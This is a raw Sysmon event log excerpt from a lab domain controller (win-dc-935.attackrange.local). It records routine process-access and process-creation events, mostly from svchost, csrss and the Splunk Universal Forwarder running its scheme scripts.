10341000x80000000000000007626Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.603{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007625Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.603{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007624Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.603{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007623Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.603{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007622Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.603{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007621Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.603{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007620Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.603{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85ED-5FCF-4601-000000009101}5020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007619Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.603{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85ED-5FCF-4601-000000009101}5020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007618Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.604{10ACEC4A-85ED-5FCF-4601-000000009101}5020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007617Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.493{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85ED-5FCF-4501-000000009101}2520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007616Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.493{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007615Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.493{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007614Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.493{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007613Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.493{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007612Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.493{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007611Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.493{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007610Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.493{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007609Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.493{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007608Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.493{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007607Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.493{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85ED-5FCF-4501-000000009101}2520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007606Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.493{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85ED-5FCF-4501-000000009101}2520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007605Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.495{10ACEC4A-85ED-5FCF-4501-000000009101}2520C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007604Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.384{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85ED-5FCF-4401-000000009101}2756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007603Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.384{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007602Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.384{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007601Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.384{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007600Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 